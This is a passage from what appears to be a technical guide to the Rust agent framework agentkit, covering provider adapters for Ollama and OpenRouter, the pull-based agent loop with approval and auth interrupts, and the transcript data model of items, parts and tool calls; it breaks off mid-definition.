    pub base_url: String,
    pub temperature: Option<f32>,
    pub num_predict: Option<u32>,
    pub top_k: Option<u32>,
    pub top_p: Option<f32>,
}

impl OllamaConfig {
    pub fn new(model: impl Into<String>) -> Self {
        Self {
            model: model.into(),
            base_url: "http://localhost:11434/v1/chat/completions".into(),
            temperature: None,
            num_predict: None,
            top_k: None,
            top_p: None,
        }
    }

    pub fn with_temperature(mut self, v: f32) -> Self {
        self.temperature = Some(v);
        self
    }

    pub fn with_num_predict(mut self, v: u32) -> Self {
        self.num_predict = Some(v);
        self
    }
    // ...
}
}

Request config

The request config is what gets serialised into the JSON body. It uses #[serde(skip_serializing_if)] so unset parameters are omitted, not sent as null:

#![allow(unused)]
fn main() {
#[derive(Clone, Serialize)]
pub struct OllamaRequestConfig {
    pub model: String,
    #[serde(skip_serializing_if = "Option::is_none")]
    pub temperature: Option<f32>,
    #[serde(skip_serializing_if = "Option::is_none")]
    pub num_predict: Option<u32>,
    #[serde(skip_serializing_if = "Option::is_none")]
    pub top_k: Option<u32>,
    #[serde(skip_serializing_if = "Option::is_none")]
    pub top_p: Option<f32>,
}
}

Provider implementation

The provider struct holds connection details and the request config. The CompletionsProvider impl is minimal — Ollama has no auth and no protocol quirks:

#![allow(unused)]
fn main() {
#[derive(Clone)]
pub struct OllamaProvider {
    base_url: String,
    request_config: OllamaRequestConfig,
}

impl CompletionsProvider for OllamaProvider {
    type Config = OllamaRequestConfig;

    fn provider_name(&self) -> &str { "Ollama" }
    fn endpoint_url(&self) -> &str { &self.base_url }
    fn config(&self) -> &OllamaRequestConfig { &self.request_config }
}
}

No hooks overridden. Ollama needs no auth, has no response quirks, and reports no provider-specific fields. The defaults pass everything through unchanged.

The adapter newtype

The adapter is a newtype over CompletionsAdapter<OllamaProvider>, delegating to it for the ModelAdapter impl:

#![allow(unused)]
fn main() {
#[derive(Clone)]
pub struct OllamaAdapter(CompletionsAdapter<OllamaProvider>);

impl OllamaAdapter {
    pub fn new(config: OllamaConfig) -> Result<Self, OllamaError> {
        let provider = OllamaProvider::from(config);
        Ok(Self(CompletionsAdapter::new(provider)?))
    }
}

#[async_trait]
impl ModelAdapter for OllamaAdapter {
    type Session = CompletionsSession<OllamaProvider>;

    async fn start_session(&self, config: SessionConfig) -> Result<Self::Session, LoopError> {
        self.0.start_session(config).await
    }
}
}

This is the complete provider. All of the transcript conversion, tool call serialisation, response parsing, multimodal encoding, and cancellation handling comes from agentkit-adapter-completions.
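
The `OllamaProvider::from(config)` call above is the only remaining glue: it splits the public config into a connection detail and the serialisable request config. A sketch of that conversion, with the field sets trimmed for brevity (this is an illustration of the pattern, not the crate's actual code):

```rust
pub struct OllamaConfig {
    pub model: String,
    pub base_url: String,
    pub temperature: Option<f32>,
}

#[derive(Clone)]
pub struct OllamaRequestConfig {
    pub model: String,
    pub temperature: Option<f32>,
}

#[derive(Clone)]
pub struct OllamaProvider {
    pub base_url: String,
    pub request_config: OllamaRequestConfig,
}

// The split: the connection detail (base_url) stays on the provider;
// everything that serialises into the JSON body moves into the request config.
impl From<OllamaConfig> for OllamaProvider {
    fn from(c: OllamaConfig) -> Self {
        Self {
            base_url: c.base_url,
            request_config: OllamaRequestConfig {
                model: c.model,
                temperature: c.temperature,
            },
        }
    }
}
```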

Contrast: what the adapter handles vs what the provider handles

agentkit-adapter-completions     agentkit-provider-ollama
Vec<Item> → messages[]           endpoint URL
Vec<ToolSpec> → tools[]          request config (model, temperature, …)
Config → request body fields     preprocess_request (none needed)
response → ModelTurnEvent        preprocess_response (none needed)
multimodal content encoding      postprocess_response (none needed)
cancellation
error status codes
tool call parsing
usage mapping
finish reason mapping

Providers with quirks

Not all OpenAI-compatible providers are identical. The three hooks exist for providers that need to customise the standard request/response flow.

OpenRouter uses all three:

  1. preprocess_request — adds bearer auth, X-Title, and HTTP-Referer headers
  2. preprocess_response — the API sometimes returns HTTP 200 with an error payload instead of a proper error status; the hook parses these and converts them to errors before the adapter attempts normal deserialization
  3. postprocess_response — extracts the cost field from the usage object (OpenRouter-specific, not part of the standard format) and adds openrouter.model and openrouter.refusal to the item metadata
#![allow(unused)]
fn main() {
impl CompletionsProvider for OpenRouterProvider {
    type Config = OpenRouterRequestConfig;

    fn provider_name(&self) -> &str { "OpenRouter" }
    fn endpoint_url(&self) -> &str { &self.base_url }
    fn config(&self) -> &OpenRouterRequestConfig { &self.request_config }

    fn preprocess_request(
        &self,
        builder: reqwest::RequestBuilder,
    ) -> reqwest::RequestBuilder {
        let mut builder = builder.bearer_auth(&self.api_key);
        if let Some(app_name) = &self.app_name {
            builder = builder.header("X-Title", app_name);
        }
        if let Some(site_url) = &self.site_url {
            builder = builder.header("HTTP-Referer", site_url);
        }
        builder
    }

    fn preprocess_response(
        &self,
        _status: StatusCode,
        body: &str,
    ) -> Result<(), LoopError> {
        if let Ok(e) = serde_json::from_str::<ErrorResponse>(body) {
            return Err(LoopError::Provider(format!(
                "OpenRouter returned error (code {}): {}",
                e.error.code, e.error.message
            )));
        }
        Ok(())
    }

    fn postprocess_response(
        &self,
        usage: &mut Option<Usage>,
        metadata: &mut MetadataMap,
        raw_response: &Value,
    ) {
        if let Some(cost) = raw_response.pointer("/usage/cost").and_then(Value::as_f64) {
            if let Some(usage) = usage {
                usage.cost = Some(CostUsage {
                    amount: cost,
                    currency: "USD".into(),
                    provider_amount: None,
                });
            }
        }
        if let Some(model) = raw_response.get("model").and_then(Value::as_str) {
            metadata.insert("openrouter.model".into(), Value::String(model.into()));
        }
        if let Some(refusal) = raw_response
            .pointer("/choices/0/message/refusal")
            .and_then(Value::as_str)
        {
            metadata.insert("openrouter.refusal".into(), Value::String(refusal.into()));
        }
    }
}
}

Using it:

#![allow(unused)]
fn main() {
let adapter = OpenRouterAdapter::new(
    OpenRouterConfig::new("sk-or-v1-...", "anthropic/claude-sonnet-4")
        .with_temperature(0.0)
        .with_max_completion_tokens(4096)
        .with_app_name("my-agent"),
)?;

let agent = Agent::builder()
    .model(adapter)
    .build()?;
}

Even without tools or a multi-turn loop, an agent can be used for a one-shot inference call — send a message, get a response:

#![allow(unused)]
fn main() {
let mut driver = agent
    .start(SessionConfig {
        session_id: SessionId::new("one-shot"),
        metadata: MetadataMap::new(),
        cache: Some(PromptCacheRequest {
            mode: PromptCacheMode::BestEffort,
            strategy: PromptCacheStrategy::Automatic,
            retention: Some(PromptCacheRetention::Short),
            key: None,
        }),
    })
    .await?;

driver.submit_input(vec![Item {
    id: None,
    kind: ItemKind::User,
    parts: vec![Part::Text(TextPart {
        text: "Explain quicksort in one sentence.".into(),
        metadata: MetadataMap::new(),
    })],
    metadata: MetadataMap::new(),
}])?;

if let LoopStep::Finished(result) = driver.next().await? {
    for item in result.items {
        for part in &item.parts {
            if let Part::Text(text) = part {
                println!("{}", text.text);
            }
        }
    }
}
}

The cache field is the session-level prompt caching policy — request-level configuration, not transcript data. See Chapter 15: Prompt caching for the full cache request shape, provider mapping, and per-turn overrides.

No tools are registered, so the model returns text and the driver finishes after a single turn. This is the simplest way to use agentkit — a typed HTTP client for chat completions with provider abstraction. The agent loop, covered in the next chapter, adds tool execution and iteration on top.

Available providers

agentkit ships the following provider crates, all built on agentkit-adapter-completions:

Crate                          Provider     Auth                      Default endpoint
agentkit-provider-openrouter   OpenRouter   Bearer + custom headers   openrouter.ai/api/v1/chat/completions
agentkit-provider-openai       OpenAI       Bearer                    api.openai.com/v1/chat/completions
agentkit-provider-ollama       Ollama       none                      localhost:11434/v1/chat/completions
agentkit-provider-vllm         vLLM         optional Bearer           localhost:8000/v1/chat/completions
agentkit-provider-groq         Groq         Bearer                    api.groq.com/openai/v1/chat/completions
agentkit-provider-mistral      Mistral      Bearer                    api.mistral.ai/v1/chat/completions

Each follows the same pattern: a config struct with new() fluent builders (and an optional from_env() helper), a Serialize request config, and a CompletionsProvider impl. Provider-specific parameters are strongly typed — Ollama has num_predict and top_k, Mistral uses max_tokens instead of max_completion_tokens, OpenAI has frequency_penalty and presence_penalty.
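
A `from_env()` helper in this style might look like the following sketch. The environment variable name, error type, and field set are illustrative assumptions, not the crate's actual API; the lookup is injected so the core logic is testable without touching the process environment:

```rust
pub struct GroqConfig {
    pub api_key: String,
    pub model: String,
}

impl GroqConfig {
    // Reads the key from the process environment.
    // GROQ_API_KEY is an assumed variable name for this sketch.
    pub fn from_env(model: impl Into<String>) -> Result<Self, String> {
        Self::from_lookup(|k| std::env::var(k).ok(), model)
    }

    // Testable core: the environment lookup is injected as a closure.
    pub fn from_lookup(
        lookup: impl Fn(&str) -> Option<String>,
        model: impl Into<String>,
    ) -> Result<Self, String> {
        let api_key = lookup("GROQ_API_KEY").ok_or("GROQ_API_KEY not set")?;
        Ok(Self { api_key, model: model.into() })
    }
}
```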

For providers not listed here, you can either:

  1. Implement CompletionsProvider if the provider speaks the OpenAI chat completions format (~50 lines)
  2. Implement ModelAdapter / ModelSession / ModelTurn directly if the provider has a non-standard API (as shown in the AcmeAI example)


What is an agent loop?

A chat completion takes a transcript and returns a response. An agent loop extends this by inspecting the response for tool calls, executing them, appending the results to the transcript, and sending the updated transcript back to the model. This repeats until the model produces a response with no tool calls, or until the host intervenes.

This chapter defines the structure of that loop and maps it to agentkit’s core types.

The basic loop

An agent loop repeats five steps:

  1. Send the current transcript to the model
  2. Receive the model’s response (which may contain text, tool calls, or both)
  3. If the response contains tool calls, execute them
  4. Append the tool results to the transcript
  5. Go to 1
┌───────────────────────────────────────────┐
│              Host application             │
│                                           │
│   submit user input                       │
│        │                                  │
│        ▼                                  │
│   ┌──────────┐   ┌────────────────────┐   │
│   │Transcript│──▶│  Model inference   │   │
│   │          │◀──│  (streaming turn)  │   │
│   └──────────┘   └────────┬───────────┘   │
│        │                  │               │
│        │          ┌───────▼───────┐       │
│        │          │ Tool calls?   │       │
│        │          └───┬───────┬───┘       │
│        │           no │       │ yes       │
│        │              ▼       ▼           │
│        │          [return] [execute]      │
│        │                      │           │
│        └──────────────────────┘           │
│              append results               │
└───────────────────────────────────────────┘

The number of iterations is determined by the model at runtime. The loop may execute zero tool calls (a plain text response) or dozens across multiple turns. This is what distinguishes an agent from a pipeline — the control flow is dynamic.
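
The five steps can be sketched as a toy loop with stub types. This is a sketch of the control flow only, not agentkit's driver: the real loop streams events, checks cancellation, and can interrupt, all of which are omitted here:

```rust
// Stub response: text plus zero or more requested tool calls.
pub struct Response {
    pub text: String,
    pub tool_calls: Vec<String>,
}

pub fn agent_loop(
    mut transcript: Vec<String>,
    model: impl Fn(&[String]) -> Response,
    run_tool: impl Fn(&str) -> String,
) -> String {
    loop {
        // Steps 1-2: send the current transcript, receive the response.
        let response = model(&transcript);
        if response.tool_calls.is_empty() {
            // No tool calls: the loop terminates with a plain text response.
            return response.text;
        }
        transcript.push(response.text);
        // Steps 3-4: execute each tool call and append its result.
        for call in &response.tool_calls {
            transcript.push(run_tool(call.as_str()));
        }
        // Step 5: go to 1.
    }
}
```

Note that the iteration count is decided entirely by the `model` closure, mirroring the dynamic control flow described above.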

Loop vs pipeline

In a pipeline, data flows through a fixed sequence of stages. The topology is known at compile time. An agent loop has a dynamic topology: the model decides which tools to call, in what order, and how many times.

This has architectural consequences. A pipeline framework optimises for stage composition and throughput. An agent framework must handle:

  • variable iteration count — the loop runs until the model stops requesting tools
  • interrupt points — the host may need to intervene mid-loop (user cancellation, approval gates, auth challenges)
  • transcript growth — each iteration adds items, eventually requiring compaction
  • parallel execution — independent tool calls within a single turn can run concurrently

The control boundary

The central design question is: where does the framework yield control to the host?

agentkit uses a pull-based model. The host calls driver.next().await and receives one of two outcomes:

#![allow(unused)]
fn main() {
pub enum LoopStep {
    Interrupt(LoopInterrupt),
    Finished(TurnResult),
}
}

Finished means the model completed a turn — the host can inspect the results, submit new input, and call next() again. Interrupt means the loop cannot proceed without host action.

Host                          LoopDriver
 │                               │
 │  submit_input(items)          │
 │──────────────────────────────▶│
 │                               │
 │  next().await                 │
 │──────────────────────────────▶│
 │                               ├── send transcript to model
 │                               ├── stream response
 │                               ├── execute tool calls
 │                               ├── (possibly loop internally)
 │                               │
 │  LoopStep::Finished(result)   │
 │◀──────────────────────────────│
 │                               │
 │  next().await                 │
 │──────────────────────────────▶│
 │                               │
 │  LoopStep::Interrupt(...)     │
 │◀──────────────────────────────│  needs host decision
 │                               │
 │  resolve_approval(...)        │
 │──────────────────────────────▶│  host resolves, loop resumes
 │                               │

There is no polling, no callback registration, and no event queue the host must drain. The next() call is the only synchronisation point.

Interrupts

An interrupt pauses the loop and returns control to the host. agentkit defines three interrupt types:

#![allow(unused)]
fn main() {
pub enum LoopInterrupt {
    ApprovalRequest(PendingApproval),
    AuthRequest(PendingAuth),
    AwaitingInput(InputRequest),
}
}

Interrupt         Trigger                                               Resolution
ApprovalRequest   A tool call requires explicit permission              Host calls approve() or deny() on the PendingApproval handle
AuthRequest       A tool needs credentials the loop doesn't have        Host provides credentials or cancels
AwaitingInput     The model finished and the loop has no pending input  Host calls submit_input() with new items

Interrupts are the mechanism for user cancellation and external preemption. A user who wants to abort a loop heading in the wrong direction triggers a cancellation (via CancellationController::interrupt()), which causes the current turn to end with FinishReason::Cancelled. The host sees this in the TurnResult and can decide how to proceed — submit corrected input, adjust the system prompt, or stop entirely.

Non-blocking events

Not everything requires host intervention. Streaming deltas, usage updates, tool lifecycle events, and compaction notifications are delivered to LoopObserver implementations:

#![allow(unused)]
fn main() {
pub trait LoopObserver: Send {
    fn handle_event(&mut self, event: AgentEvent);
}
}

Observers are informational — they cannot stall the loop or alter its control flow. This keeps the driver’s state machine simple: next() either returns a LoopStep or doesn’t return yet. There is no interleaving of observer handling with loop logic.
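
A minimal observer might just accumulate streaming text. The event type here is a two-variant stub (the real AgentEvent has many more variants), but the shape of the trait impl matches the definition above:

```rust
// Stubbed event type for illustration; the real AgentEvent is much richer.
pub enum AgentEvent {
    ContentDelta(String),
    UsageUpdated,
}

pub trait LoopObserver: Send {
    fn handle_event(&mut self, event: AgentEvent);
}

#[derive(Default)]
pub struct DeltaCounter {
    pub chars_seen: usize,
}

impl LoopObserver for DeltaCounter {
    fn handle_event(&mut self, event: AgentEvent) {
        // Observers only record; they cannot pause or redirect the loop.
        if let AgentEvent::ContentDelta(text) = event {
            self.chars_seen += text.len();
        }
    }
}
```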

Blocking (LoopStep)      Non-blocking (AgentEvent)
ApprovalRequest          ContentDelta
AuthRequest              ToolCallRequested
AwaitingInput            UsageUpdated
Finished(TurnResult)     CompactionStarted / Finished
                         TurnStarted / TurnFinished
                         Warning

The three-layer model

agentkit splits the runtime into three layers:

┌─────────────────────────────────────────────┐
│  Agent                                      │
│  (config: adapter, tools, permissions,      │
│   observers, compaction)                    │
│                                             │
│   ┌─────────────────────────────────────┐   │
│   │  LoopDriver                         │   │
│   │  (mutable state: transcript,        │   │
│   │   pending input, interrupt state)   │   │
│   │                                     │   │
│   │   ┌─────────────────────────────┐   │   │
│   │   │  ModelSession               │   │   │
│   │   │  (provider connection,      │   │   │
│   │   │   turn management)          │   │   │
│   │   └─────────────────────────────┘   │   │
│   └─────────────────────────────────────┘   │
└─────────────────────────────────────────────┘
  • Agent — immutable configuration assembled via a builder. Holds the model adapter, tool registry, permission checker, observers, and compaction config. Can start multiple sessions.
  • LoopDriver<S> — the mutable runtime for a single session. Owns the transcript, manages pending input, tracks interrupt state, and drives the turn loop. Generic over the session type S.
  • ModelSession — the provider-owned session handle. Created by the adapter, consumed by the driver. Each turn calls begin_turn() which returns a streaming ModelTurn.

This separation means you configure once and run many sessions, including multiple concurrent sessions from the same Agent, each with its own LoopDriver and independent transcript.

A minimal example

The openrouter-chat example demonstrates the simplest possible host loop. The key parts:

Setup — build an Agent with just a model adapter, start a session:

#![allow(unused)]
fn main() {
let agent = Agent::builder()
    .model(adapter)
    .cancellation(cancellation.handle())
    .build()?;

let mut driver = agent
    .start(SessionConfig {
        session_id: SessionId::new("openrouter-chat"),
        metadata: MetadataMap::new(),
        cache: Some(PromptCacheRequest {
            mode: PromptCacheMode::BestEffort,
            strategy: PromptCacheStrategy::Automatic,
            retention: Some(PromptCacheRetention::Short),
            key: None,
        }),
    })
    .await?;
}

The cache field configures prompt caching for the session. It is optional, but most long-running agents benefit from setting it. See Chapter 15 for the full cache request shape.

Submit input — construct an Item with ItemKind::User and a TextPart:

#![allow(unused)]
fn main() {
driver.submit_input(vec![Item {
    id: None,
    kind: ItemKind::User,
    parts: vec![Part::Text(TextPart {
        text: prompt.into(),
        metadata: MetadataMap::new(),
    })],
    metadata: MetadataMap::new(),
}])?;
}

Drive the loop — call next().await and match on the result:

#![allow(unused)]
fn main() {
match driver.next().await? {
    LoopStep::Finished(result) => {
        // Render assistant items from result.items
    }
    LoopStep::Interrupt(LoopInterrupt::AwaitingInput(_)) => {
        // Model finished, prompt user for more input
    }
    LoopStep::Interrupt(LoopInterrupt::ApprovalRequest(pending)) => {
        // A tool needs permission — approve or deny
    }
    LoopStep::Interrupt(LoopInterrupt::AuthRequest(request)) => {
        // A tool needs credentials
    }
}
}

This is the entire host-side contract. The loop handles streaming, tool execution, transcript accumulation, and compaction internally. The host only sees LoopStep values — either results to render or interrupts to resolve.

No tools are registered in this example, so the model cannot make tool calls and the loop always returns Finished after a single inference turn. Adding tools is covered in Chapter 9.

What comes next

The following chapters build up each piece of this system:

  • Chapter 3 defines the data model — the Item and Part types that make up the transcript
  • Chapter 4 covers how streaming works and how deltas fold into durable parts
  • Chapter 5 defines the boundary between the loop and model providers
  • Chapter 6 walks through the driver implementation
  • Chapter 7 covers the interrupt system in detail

The transcript model

The transcript is the agent’s memory of a conversation. Every message, tool call, tool result, and piece of context is represented as an Item in a Vec<Item>. The model sees the transcript on every turn. The loop appends to it. Compaction trims it.

This chapter covers agentkit-core: the foundational data types that every other crate depends on.

The transcript as a data structure

A transcript is a flat vector of items. Each item has a role and carries content:

Vec<Item>
├── Item { kind: System,     parts: [Text("You are a coding assistant.")] }
├── Item { kind: Context,    parts: [Text("Project uses Rust 2024 edition...")] }
├── Item { kind: User,       parts: [Text("Read src/main.rs")] }
├── Item { kind: Assistant,  parts: [Text("I'll read that file."),
│                                    ToolCall { name: "fs.read_file", ... }] }
├── Item { kind: Tool,       parts: [ToolResult { output: "fn main() {...}", ... }] }
└── Item { kind: Assistant,  parts: [Text("The file contains...")] }

This is the complete state that the model receives on every turn. The loop does not maintain hidden side channels or out-of-band context — if something affects the model’s behaviour, it’s in the transcript.

Items and roles

An Item is the basic unit of the transcript:

#![allow(unused)]
fn main() {
pub struct Item {
    pub id: Option<MessageId>,
    pub kind: ItemKind,
    pub parts: Vec<Part>,
    pub metadata: MetadataMap,
}
}

The kind field determines the item’s role:

#![allow(unused)]
fn main() {
pub enum ItemKind {
    System,      // Application-level instructions
    Developer,   // Developer-level instructions
    User,        // End-user messages
    Assistant,   // Model-generated responses
    Tool,        // Tool execution results
    Context,     // Loaded project context (AGENTS.md, skills, etc.)
}
}

The variants are ordered: System < Developer < User < Assistant < Tool < Context. This ordering is used by compaction strategies that need to sort or prioritise items by role.
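
In Rust, this ordering falls out of deriving Ord on the enum: the derive follows declaration order. A minimal illustration (derives trimmed to what the ordering needs):

```rust
// Declaration order gives System < Developer < ... < Context.
#[derive(Clone, Debug, PartialEq, Eq, PartialOrd, Ord)]
pub enum ItemKind {
    System,
    Developer,
    User,
    Assistant,
    Tool,
    Context,
}
```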

Role mapping to provider wire formats:

agentkit ItemKind   OpenAI role   What it carries
System              "system"      Hardcoded application instructions
Developer           "system"      Developer-level instructions
User                "user"        End-user messages
Assistant           "assistant"   Model-generated text + tool calls
Tool                "tool"        Tool execution results
Context             "system"      Project context (AGENTS.md, etc.)

System, Developer, and Context all map to "system" in the OpenAI wire format, but they carry different semantic intent. The distinction matters for compaction: system items are never trimmed, context items may be refreshed, and developer items sit between the two. Collapsing them into a single kind would lose information that compaction strategies need.
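
The projection to the wire format is a simple collapsing match at the adapter boundary; a sketch of what that mapping looks like:

```rust
pub enum ItemKind { System, Developer, User, Assistant, Tool, Context }

// Six internal kinds collapse to four OpenAI roles; the distinction
// is preserved in the transcript, not on the wire.
pub fn openai_role(kind: &ItemKind) -> &'static str {
    match kind {
        ItemKind::System | ItemKind::Developer | ItemKind::Context => "system",
        ItemKind::User => "user",
        ItemKind::Assistant => "assistant",
        ItemKind::Tool => "tool",
    }
}
```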

Why item-based, not message-based

Older chat APIs model conversations as a flat list of messages with a role field. agentkit uses “items” with “parts” instead, because modern models work with content blocks — a single assistant response may contain text, a tool call, reasoning output, and structured data. Flattening these into separate messages loses structure that the model, compaction strategies, and reporters all need.

Flat message model (what you'd get with role + string):

  { role: "assistant", content: "I'll read main.rs" }
  { role: "assistant", content: null, tool_calls: [...] }

  Two "messages" for one logical response.
  Which one do you compact? How do you correlate them?


Item + parts model (agentkit):

  Item {
      kind: Assistant,
      parts: [
          Text("I'll read main.rs"),
          ToolCall { name: "fs.read_file", input: { "path": "src/main.rs" } },
      ]
  }

  One item. All parts belong to the same response.
  Compaction, reporting, and persistence all see one unit.

Content parts

Each item contains one or more Part values:

#![allow(unused)]
fn main() {
pub enum Part {
    Text(TextPart),
    Media(MediaPart),
    File(FilePart),
    Structured(StructuredPart),
    Reasoning(ReasoningPart),
    ToolCall(ToolCallPart),
    ToolResult(ToolResultPart),
    Custom(CustomPart),
}
}

The part types cover the full range of content that flows through an agent:

Part variant   Primary use                         Example
Text           User messages, assistant replies    "Hello, world!"
Media          Images, audio, video                A PNG screenshot
File           File attachments                    report.csv
Structured     JSON output, function returns       { "status": "ok" }
Reasoning      Chain-of-thought, thinking blocks   Model's internal reasoning
ToolCall       Model requests a tool invocation    fs.read_file("src/main.rs")
ToolResult     Tool execution output               "fn main() { ... }"
Custom         Provider-specific extensions        Raw provider-specific content

Design decision: comprehensive multimodal from day one

agentkit ships with first-class support for text, audio, image, video, files, structured output, and reasoning blocks. The Custom variant exists as an escape hatch for provider-specific content, but the goal is that Custom should be rare — common modalities should map to named variants.

This matters because a text-only provider, a voice-only provider, and a multimodal provider all map naturally into the same Item { parts: Vec<Part> } structure. Complexity grows linearly with modalities, not combinatorially with provider combinations.

Part type details

TextPart is the simplest and most common:

#![allow(unused)]
fn main() {
pub struct TextPart {
    pub text: String,
    pub metadata: MetadataMap,
}
}

MediaPart handles binary content through a modality discriminant and a data reference:

#![allow(unused)]
fn main() {
pub struct MediaPart {
    pub modality: Modality,    // Audio, Image, Video, Binary
    pub mime_type: String,     // e.g. "image/png", "audio/wav"
    pub data: DataRef,
    pub metadata: MetadataMap,
}
}

ReasoningPart captures model chain-of-thought output, which some providers expose alongside the final answer:

#![allow(unused)]
fn main() {
pub struct ReasoningPart {
    pub summary: Option<String>,   // Human-readable reasoning
    pub data: Option<DataRef>,     // Opaque reasoning data
    pub redacted: bool,            // Provider filtered the content
    pub metadata: MetadataMap,
}
}

The redacted flag is important: some providers expose reasoning in debug mode but redact it in production. The transcript records that reasoning happened even when the content is withheld.

StructuredPart carries validated JSON output:

#![allow(unused)]
fn main() {
pub struct StructuredPart {
    pub value: Value,
    pub schema: Option<Value>,     // JSON Schema the value conforms to
    pub metadata: MetadataMap,
}
}

The DataRef abstraction

Media, files, and other binary content don’t carry their bytes inline by default. Instead, they reference data through DataRef:

#![allow(unused)]
fn main() {
pub enum DataRef {
    InlineText(String),    // UTF-8 text (e.g. base64-encoded image)
    InlineBytes(Vec<u8>),  // Raw bytes
    Uri(String),           // External URL
    Handle(ArtifactId),    // Reference to an artifact store
}
}

This is a storage-agnostic pointer. The same MediaPart can reference an image as a base64 string (for small images going directly to the model), a URL (for provider-hosted content), or an artifact handle (for content managed by the host application).

DataRef variants and when to use them:

InlineText ─── small payloads already base64-encoded
                (provider APIs often accept images this way)

InlineBytes ── small payloads in raw binary form
                (useful for local processing before encoding)

Uri ────────── content hosted externally
                (the provider fetches it, or the adapter does)

Handle ─────── content in a host-managed artifact store
                (transcript stays lightweight, data lives elsewhere)

This lets the transcript stay lightweight while supporting large payloads through external storage. A conversation with many image screenshots doesn’t bloat the transcript if the images are stored as Handle references.
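
A host might pick the variant based on payload size. The threshold, the store type, and the handle format below are all hypothetical; the point is only that the decision is the host's, not the transcript's:

```rust
pub enum DataRef {
    InlineText(String),
    InlineBytes(Vec<u8>),
    Uri(String),
    Handle(String), // ArtifactId simplified to a String for this sketch
}

// Hypothetical policy: inline small payloads, push large ones into a
// host-managed store and keep only a handle in the transcript.
pub fn store_media(bytes: Vec<u8>, store: &mut Vec<Vec<u8>>, inline_limit: usize) -> DataRef {
    if bytes.len() <= inline_limit {
        DataRef::InlineBytes(bytes)
    } else {
        store.push(bytes);
        DataRef::Handle(format!("artifact-{}", store.len() - 1))
    }
}
```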

Tool call and result types

Tool interaction is modeled as content parts, not side channels:

#![allow(unused)]
fn main() {
pub struct ToolCallPart {
    pub id: ToolCallId,
    pub name: String,
    pub input: serde_json::Value,
    pub metadata: MetadataMap,
}

pub struct ToolResultPart {
    pub call_id: ToolCallId,
    pub output: ToolOutput,
    pub is_error: bool,
    pub metadata: MetadataMap,
}
}

The call_id on ToolResultPart references the id on ToolCallPart. This correlation is how the model matches results back to the requests it made.

Correlation between tool calls and results:

  Item { kind: Assistant, parts: [
      ToolCall { id: "call-1", name: "fs.read_file", input: {...} },
      ToolCall { id: "call-2", name: "shell.exec",   input: {...} },
  ]}
       │                                │
       │ call_id: "call-1"              │ call_id: "call-2"
       ▼                                ▼
  Item { kind: Tool, parts: [
      ToolResult { call_id: "call-1", output: "fn main()...", is_error: false },
      ToolResult { call_id: "call-2", output: "error: ...",   is_error: true  },
  ]}

When the model requests multiple tool calls in a single response, the assistant item contains multiple ToolCallParts, and the corresponding tool item contains multiple ToolResultParts. The id/call_id pairs maintain the mapping.
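
A host or reporter that wants to walk calls alongside their results can build the correlation with a map keyed by call id. A sketch using stub part types that carry only the fields correlation needs:

```rust
use std::collections::HashMap;

// Stub part types; the real ToolCallPart/ToolResultPart carry more fields.
pub struct ToolCallPart { pub id: String, pub name: String }
pub struct ToolResultPart { pub call_id: String, pub is_error: bool }

// Pair each call with its result (if any) by matching call_id to id.
pub fn correlate<'a>(
    calls: &'a [ToolCallPart],
    results: &'a [ToolResultPart],
) -> Vec<(&'a ToolCallPart, Option<&'a ToolResultPart>)> {
    let by_id: HashMap<&str, &ToolResultPart> =
        results.iter().map(|r| (r.call_id.as_str(), r)).collect();
    calls
        .iter()
        .map(|c| (c, by_id.get(c.id.as_str()).copied()))
        .collect()
}
```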

ToolOutput preserves rich structure:

#![allow(unused)]
fn main() {
pub enum ToolOutput {
    Text(String),
    Structured(Value),
    Parts(Vec<Part>),
    Files(Vec<FilePart>),
}
}

Tools don’t have to collapse their output to a plain string. A tool that reads a file returns Text. A tool that queries a database returns Structured. A tool that captures a screenshot returns Parts containing a MediaPart. The loop and provider adapter decide how to serialize the output when building the next model request.

Typed identifiers

agentkit uses newtype wrappers for all identifiers:

#![allow(unused)]
fn main() {
pub struct SessionId(pub String);
pub struct TurnId(pub String);
pub struct MessageId(pub String);
pub struct ToolCallId(pub String);
pub struct TaskId(pub String);
pub struct ApprovalId(pub String);
pub struct ProviderMessageId(pub String);
pub struct ArtifactId(pub String);
pub struct PartId(pub String);
}

All are generated by the same id_newtype! macro, which derives Clone, Debug, Serialize, Deserialize, Hash, Eq, and Ord, and implements Display plus conversions from &str and String.

This prevents accidental mix-ups — passing a ToolCallId where a TaskId is expected is a compile error, not a runtime bug. The cost is some verbosity when constructing IDs (SessionId::new("my-session") instead of "my-session"), but the safety benefit compounds across a codebase where dozens of string IDs flow through multiple layers.

Without newtypes:

  fn execute(call_id: String, task_id: String, session_id: String) { ... }
  execute(session_id, call_id, task_id);  // compiles, wrong at runtime

With newtypes:

  fn execute(call_id: ToolCallId, task_id: TaskId, session_id: SessionId) { ... }
  execute(session_id, call_id, task_id);  // compile error
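
A pared-down version of such a macro can be sketched with macro_rules!. This omits the serde derives the text mentions (they need the serde crate) and is an illustration of the pattern, not the actual id_newtype! source:

```rust
macro_rules! id_newtype {
    ($name:ident) => {
        #[derive(Clone, Debug, PartialEq, Eq, PartialOrd, Ord, Hash)]
        pub struct $name(pub String);

        impl $name {
            pub fn new(s: impl Into<String>) -> Self {
                Self(s.into())
            }
        }

        impl std::fmt::Display for $name {
            fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
                f.write_str(&self.0)
            }
        }

        impl From<&str> for $name {
            fn from(s: &str) -> Self {
                Self(s.to_string())
            }
        }
    };
}

// One macro invocation per identifier type.
id_newtype!(SessionId);
id_newtype!(ToolCallId);
```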

The metadata bag

Every significant type carries a MetadataMap:

#![allow(unused)]
fn main() {
pub type MetadataMap = BTreeMap<String, serde_json::Value>;
}

This is the extension point. Provider-specific data (like an OpenAI logprobs field or an OpenRouter cost value) lives in namespaced metadata keys rather than polluting the core schema. The convention is provider_name.field_name:

Metadata key                Source               Example value
openrouter.model            OpenRouter adapter   "anthropic/claude-3.5-sonnet"
openrouter.refusal          OpenRouter adapter   "I cannot help with that"
agentkit.interrupted        Loop driver          true
agentkit.interrupt_reason   Loop driver          "user_cancelled"

BTreeMap is used instead of HashMap for deterministic serialization order — metadata roundtrips through JSON identically regardless of insertion order. This matters for snapshot testing and transcript persistence.

The rest of the stack never depends on metadata for correctness. It’s there for observability, debugging, and host-specific extensions.

Usage and finish reasons

Token counts and costs are first-class:

#![allow(unused)]
fn main() {
pub struct Usage {
    pub tokens: Option<TokenUsage>,
    pub cost: Option<CostUsage>,
    pub metadata: MetadataMap,
}

pub struct TokenUsage {
    pub input_tokens: u64,
    pub output_tokens: u64,
    pub reasoning_tokens: Option<u64>,
    pub cached_input_tokens: Option<u64>,
    pub cache_write_input_tokens: Option<u64>,
}

pub struct CostUsage {
    pub amount: f64,
